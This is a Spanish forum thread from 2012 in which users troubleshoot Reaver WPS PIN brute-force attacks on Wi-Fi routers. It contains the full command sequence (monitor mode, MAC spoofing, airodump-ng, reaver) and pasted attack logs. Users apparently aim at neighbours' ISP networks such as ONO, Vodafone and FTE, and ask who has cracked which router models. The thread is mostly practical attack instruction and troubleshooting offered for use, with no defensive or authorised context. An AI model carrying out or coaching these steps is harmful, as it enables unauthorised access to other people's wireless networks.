REAVER: Vulnerabilidad de WPA por WPS habilitado

Iniciado por ChimoC, 15 Enero 2012, 02:25 AM

0 Miembros y 5 Visitantes están viendo este tema.

maik78

Buenas a todos,
Gracias por darnos soporte...
A ver voy con mi problema, tengo broadcom y solo hago funcionar el wifislax 4.1 beta 3 por ahi por donde intento sacar la clave de onoxxxx, pero no sé si lo hago mal o no espero el suficiente tiempo.
Hago los siguientes pasos:

airmon-ng start wlan0

Abro el wireshark, busco la red que tenga WPS

Cambio la MAC
macchanger -m 00:11:22:33:44:55 mon0

airodump-ng mon0

reaver -i mon0 -b ESSID ELEGIDA -vv

Y se mete en un bucle de canales, lo más interesante que me sale es esto:

[!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
  • Sending EAPOL START request
  • Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
  • Nothing done, nothing to save.
  • 0.00% complete @ 2012-07-22 10:03:19 (0 seconds/pin)
  • Trying pin 12345670

    Y al final lo quite a las 20 horas de no tener resultado.
    Es normal?? Tengo que esperar más??
    Muchas gracias.



GOolden

Alguien ha sacado alguna fte-xxxx modelo sagem con wps activado

GOolden

maik78 quizas la ono esa tenga el wps activado pero no se vulnerable al ataque de reaver dime la mac y mas datos sobre esa red y tu has sacado alguna vodafone salud

maik78

Buenas GOolden a ver yo en esto de las WPS estoy verde... Como he dicho antes es una ONOXXXX con MAC 30:46:9A... con seguridad WPA2...

Me extraña lo de no ser vulnerable, por lo que he visto las WPS son vulnerables al 95%

Saludos.

GOolden

Hola maik78 quizas ese router no es vulnerable a ese ataque es que hay router que aunque tengan el wps activo no son vulnerables al reaver tambien influye la distancia que este el router de ti hay mucha distancia

P4nd3m0n1um


GOolden

P4nd3m0n1um tu has sacado alguna red con esta mac 64:16:f0

P4nd3m0n1um


GOolden

#218
Sending EAPOL START request
Sending identity response
Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
          que significa esto todo va bien va cambiando de pin pero ha un cierto intentos de pines se para lo pongo otra vez y sigue avanzando es una red vodafone que estoy haciendo pruebas y quiero saber si conseguire la clave o no pero va cambiando de pin con esos mesages que o epuesto y se para ha cierto intentos

maik78

Cita de: P4nd3m0n1um en 23 Julio 2012, 18:22 PM
broadcom no es compatible con reaver.

Perdonar la ignorancia pero sí no fuesen compatibles qué llegué el conteo a esto:

0.56% complete @ 2012-07-22 10:03:19 (265 seconds/pin)
Es posible??